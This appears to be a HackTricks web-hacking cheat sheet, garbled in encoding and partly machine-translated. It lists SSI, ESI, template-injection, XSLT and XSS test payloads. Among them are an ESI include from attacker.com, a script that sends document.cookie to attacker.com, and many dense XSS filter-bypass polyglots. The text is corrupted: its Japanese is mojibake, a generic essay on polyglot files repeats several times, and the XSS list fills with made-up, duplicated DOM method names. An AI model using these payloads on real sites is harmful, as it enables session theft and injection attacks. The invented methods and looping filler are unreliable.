ããªã°ãããã¯ãããã«ãŒã®æŠåšã®äžã§ã匷åãªããŒã«ã§ãããã¡ã€ã«ã¿ã€ãã®ç°ãªã解éãå©çšããããšã§ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸããã»ãã¥ãªãã£ã®å°é家ã¯ãããªã°ãããã®æè¡ã«ã€ããŠèªèããŠããããšãéèŠã§ããããã«ãããå¹æçã«å¯ŸåŠããããšãã§ããŸãã
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
ãµãŒããŒãµã€ããªã¯ãšã¹ããã©ãŒãžã§ãª
ãªãŒãã³ãªãã€ã¬ã¯ãã«äœ¿çšããããã¹ããšåããã®ãããã§ã䜿çšã§ããŸãã
ãµãŒããŒãµã€ããã³ãã¬ãŒãã€ã³ãžã§ã¯ã·ã§ã³
åºæ¬çãªãã¹ã
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
ããªã°ããã
A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
ããªã°ãããã¯ãéãããæèã«ãã£ãŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ãããã¡ã€ã«ã§ãããŠã§ããããã³ã°ã®æèã§ã¯ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸãã
Polyglot Techniques
Comment Polyglots
Comment polyglots exploit the fact that different file types have different comment syntax. By strategically placing comments in a file, it can be interpreted as multiple file types.
ã³ã¡ã³ãããªã°ããã
ã³ã¡ã³ãããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãã³ã¡ã³ãã®æ§æããããšããäºå®ãå©çšããŸãããã¡ã€ã«ã«ã³ã¡ã³ããæŠç¥çã«é 眮ããããšã§ãè€æ°ã®ãã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
Extension Polyglots
Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as multiple file types.
æ¡åŒµåããªã°ããã
æ¡åŒµåããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªããã¡ã€ã«æ¡åŒµåããããšããäºå®ãå©çšããŸããç¹å®ã®çµã¿åããã®ãã¡ã€ã«æ¡åŒµåã䜿çšããããšã§ããã¡ã€ã«ã¯è€æ°ã®ãã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
MIME Type Polyglots
MIME type polyglots exploit the fact that different file types have different MIME types. By manipulating the MIME type of a file, it can be interpreted as multiple file types.
MIMEã¿ã€ãããªã°ããã
MIMEã¿ã€ãããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãMIMEã¿ã€ãããããšããäºå®ãå©çšããŸãããã¡ã€ã«ã®MIMEã¿ã€ããæäœããããšã§ããã¡ã€ã«ã¯è€æ°ã®ãã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
Conclusion
Polyglots are powerful tools in the arsenal of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.
çµè«
ããªã°ãããã¯ãããã«ãŒã®æŠåšã®äžã§ã匷åãªããŒã«ã§ãããã¡ã€ã«ã¿ã€ãã®ç°ãªã解éãå©çšããããšã§ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸããã»ãã¥ãªãã£ã®å°é家ã¯ãããªã°ãããã®æè¡ã«ã€ããŠèªèããŠããããšãéèŠã§ããããã«ãããå¹æçã«å¯ŸåŠããããšãã§ããŸãã
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
XSLT ãµãŒããŒãµã€ãã€ã³ãžã§ã¯ã·ã§ã³
åºæ¬çãªãã¹ã
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
ããªã°ããã
A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
ããªã°ãããã¯ãéãããæèã«ãã£ãŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ãããã¡ã€ã«ã§ãããŠã§ããããã³ã°ã®æèã§ã¯ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸãã
Polyglot File Types
ããªã°ããããã¡ã€ã«ã®çš®é¡
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing for the execution of JavaScript code within an HTML context.
-
HTML/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãHTMLãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããHTMLã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript, allowing for the execution of JavaScript code within an XML context.
-
XML/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãXMLãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããXMLã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
SVG/JavaScript Polyglots: These files can be interpreted as both SVG and JavaScript, allowing for the execution of JavaScript code within an SVG context.
-
SVG/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãSVGãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããSVGã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing for the execution of JavaScript code within an image context.
-
ç»å/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãç»åãã¡ã€ã«ãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããç»åã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing for the execution of JavaScript code within a PDF context.
-
PDF/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãPDFãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããPDFã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript, allowing for the execution of JavaScript code within a ZIP context.
-
ZIP/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãZIPã¢ãŒã«ã€ããšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããZIPã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
Advantages of Polyglots
ããªã°ãããã®å©ç¹
-
Bypassing Security Measures: Polyglots can be used to bypass security measures that are designed to detect specific file types. By appearing as multiple file types, polyglots can evade detection and execute malicious code.
-
ã»ãã¥ãªãã£å¯Ÿçã®åé¿: ããªã°ãããã¯ãç¹å®ã®ãã¡ã€ã«ã¿ã€ããæ€åºããããã«èšèšãããã»ãã¥ãªãã£å¯Ÿçãåé¿ããããã«äœ¿çšããããšãã§ããŸããè€æ°ã®ãã¡ã€ã«ã¿ã€ããšããŠè¡šç€ºãããããšã§ãããªã°ãããã¯æ€åºãåé¿ããæªæã®ããã³ãŒããå®è¡ããããšãã§ããŸãã
-
Exploiting Vulnerabilities: Polyglots can be used to exploit vulnerabilities in software that handle different file types. By tricking the software into interpreting the polyglot as a specific file type, an attacker can execute malicious code and gain unauthorized access.
-
è匱æ§ã®æªçš: ããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ããåŠçãããœãããŠã§ã¢ã®è匱æ§ãæªçšããããã«äœ¿çšããããšãã§ããŸããããªã°ããããç¹å®ã®ãã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšã§ãæ»æè ã¯æªæã®ããã³ãŒããå®è¡ããäžæ£ãªã¢ã¯ã»ã¹ãè¡ãããšãã§ããŸãã
-
Concealing Malicious Code: By embedding malicious code within a polyglot, an attacker can hide their intentions and make it more difficult for security measures to detect the code.
-
æªæã®ããã³ãŒãã®é èœ: ããªã°ãããã«æªæã®ããã³ãŒããåã蟌ãããšã§ãæ»æè ã¯èªåã®æå³ãé ããã»ãã¥ãªãã£å¯Ÿçãã³ãŒããæ€åºããã®ãããå°é£ã«ããããšãã§ããŸãã
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
XSS
åºæ¬ãã¹ã
1. Alert
<script>alert('XSS');</script>
2. Image
<img src="x" onerror="alert('XSS');">
3. Input
<input type="text" value="<script>alert('XSS');</script>">
4. Link
<a href="javascript:alert('XSS');">Click me</a>
5. SVG
<svg onload="alert('XSS');"></svg>
6. Style
<style>body{background-image:url('javascript:alert("XSS")');}</style>
7. Div
<div style="background-image:url(javascript:alert('XSS'))">Test</div>
8. Table
<table background="javascript:alert('XSS')">
9. Form
<form action="javascript:alert('XSS')">
10. Event Handler
<button onclick="alert('XSS')">Click me</button>
11. JavaScript URI
<a href="javascript:alert('XSS')">Click me</a>
12. Data URI
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ+">Click me</a>
13. Onload
<body onload="alert('XSS')">
14. Meta
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
15. Cookie
<script>document.location='https://attacker.com/collect.php?cookie='+document.cookie;</script>
16. Local Storage
<script>localStorage.setItem('xss', 'true');</script>
17. Session Storage
<script>sessionStorage.setItem('xss', 'true');</script>
18. Document Cookie
<script>document.cookie='xss=true';</script>
19. Document Write
<script>document.write('XSS');</script>
20. Document Domain
<script>document.domain='attacker.com';</script>
21. Document Referrer
<script>document.referrer;</script>
22. Document Location
<script>document.location='https://attacker.com';</script>
23. Document Title
<script>document.title='XSS';</script>
24. Document WriteLn
<script>document.writeln('XSS');</script>
25. Document Open
<script>document.open();document.write('XSS');</script>
26. Document Close
<script>document.close();</script>
27. Document CreateElement
<script>document.createElement('img');</script>
28. Document CreateTextNode
<script>document.createTextNode('XSS');</script>
29. Document CreateEvent
<script>document.createEvent('Event');</script>
30. Document CreateRange
<script>document.createRange();</script>
31. Document CreateComment
<script>document.createComment('XSS');</script>
32. Document CreateAttribute
<script>document.createAttribute('XSS');</script>
33. Document CreateDocumentFragment
<script>document.createDocumentFragment();</script>
34. Document CreateExpression
<script>document.createExpression('XSS');</script>
35. Document CreateNSResolver
<script>document.createNSResolver('XSS');</script>
36. Document CreateProcessingInstruction
<script>document.createProcessingInstruction('XSS');</script>
37. Document CreateTreeWalker
<script>document.createTreeWalker('XSS');</script>
38. Document CreateNodeIterator
<script>document.createNodeIterator('XSS');</script>
39. Document CreateCDATASection
<script>document.createCDATASection('XSS');</script>
40. Document CreateEntityReference
<script>document.createEntityReference('XSS');</script>
41. Document CreateEntity
<script>document.createEntity('XSS');</script>
42. Document CreateNotation
<script>document.createNotation('XSS');</script>
43. Document CreateProcessingInstruction
<script>document.createProcessingInstruction('XSS');</script>
44. Document CreateAttributeNS
<script>document.createAttributeNS('XSS');</script>
45. Document CreateElementNS
<script>document.createElementNS('XSS');</script>
46. Document CreateEventObject
<script>document.createEventObject('XSS');</script>
47. Document CreateStyleSheet
<script>document.createStyleSheet('XSS');</script>
48. Document CreatePopup
<script>document.createPopup('XSS');</script>
49. Document CreateRangeCollection
<script>document.createRangeCollection('XSS');</script>
50. Document CreateRenderStyle
<script>document.createRenderStyle('XSS');</script>
51. Document CreateRenderStyleRule
<script>document.createRenderStyleRule('XSS');</script>
52. Document CreateRenderStyleRuleList
<script>document.createRenderStyleRuleList('XSS');</script>
53. Document CreateRenderStyleRuleIterator
<script>document.createRenderStyleRuleIterator('XSS');</script>
54. Document CreateRenderStyleRuleListIterator
<script>document.createRenderStyleRuleListIterator('XSS');</script>
55. Document CreateRenderStyleRuleListCollection
<script>document.createRenderStyleRuleListCollection('XSS');</script>
56. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
57. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
58. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
59. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
60. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
61. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
62. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
63. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
64. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
65. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
66. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
67. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
68. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
69. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
70. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
71. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
72. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
73. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
74. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
75. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
76. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
77. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
78. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
79. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
80. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
81. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
82. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
83. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
84. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
85. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
86. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
87. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
88. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
89. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
90. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
91. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
92. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
93. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
94. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
95. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
96. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
97. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
98. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
99. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
100. Document CreateRenderStyleRuleListCollectionIterator
<script>document.createRenderStyleRuleListCollectionIterator('XSS');</script>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
ããªã°ããã
A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
ããªã°ãããã¯ãéãããæèã«ãã£ãŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ãããã¡ã€ã«ã§ãããŠã§ããããã³ã°ã®æèã§ã¯ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸãã
Polyglot Techniques
Comment Polyglots
Comment polyglots exploit the fact that different file types have different comment syntax. By crafting a file with comments in multiple formats, it can be interpreted as different file types depending on the context.
ã³ã¡ã³ãããªã°ããã
ã³ã¡ã³ãããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãã³ã¡ã³ãã®æ§æããããšããäºå®ãå©çšããŠããŸããè€æ°ã®åœ¢åŒã®ã³ã¡ã³ããå«ããã¡ã€ã«ãäœæããããšã§ãæèã«å¿ããŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
Extension Polyglots
Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as different file types depending on the context.
æ¡åŒµåããªã°ããã
æ¡åŒµåããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªããã¡ã€ã«æ¡åŒµåããããšããäºå®ãå©çšããŠããŸããç¹å®ã®çµã¿åããã®ãã¡ã€ã«æ¡åŒµåã䜿çšããããšã§ãæèã«å¿ããŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
MIME Type Polyglots
MIME type polyglots exploit the fact that different file types have different MIME types. By crafting a file with multiple MIME types, it can be interpreted as different file types depending on the context.
MIMEã¿ã€ãããªã°ããã
MIMEã¿ã€ãããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãMIMEã¿ã€ãããããšããäºå®ãå©çšããŠããŸããè€æ°ã®MIMEã¿ã€ããæã€ãã¡ã€ã«ãäœæããããšã§ãæèã«å¿ããŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
Conclusion
Polyglots are powerful tools in the hands of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.
çµè«
ããªã°ãããã¯ãããã«ãŒã®æã«ãã匷åãªããŒã«ã§ãããã¡ã€ã«ã¿ã€ãã®ç°ãªã解éãå©çšããããšã§ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸããã»ãã¥ãªãã£ã®å°é家ã¯ãããªã°ãããã®æè¡ã«ã€ããŠæ£ããç解ããããã«å¯ŸããŠå¹æçã«é²åŸ¡ããããšãéèŠã§ãã
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button â onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒç€Ÿã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ã«ã¢ã¯ã»ã¹ããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§ãã©ããŒããŠãã ããðŠ@carlospolopm.
-
**ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããª**ã«PRãæåºããŠãã ããã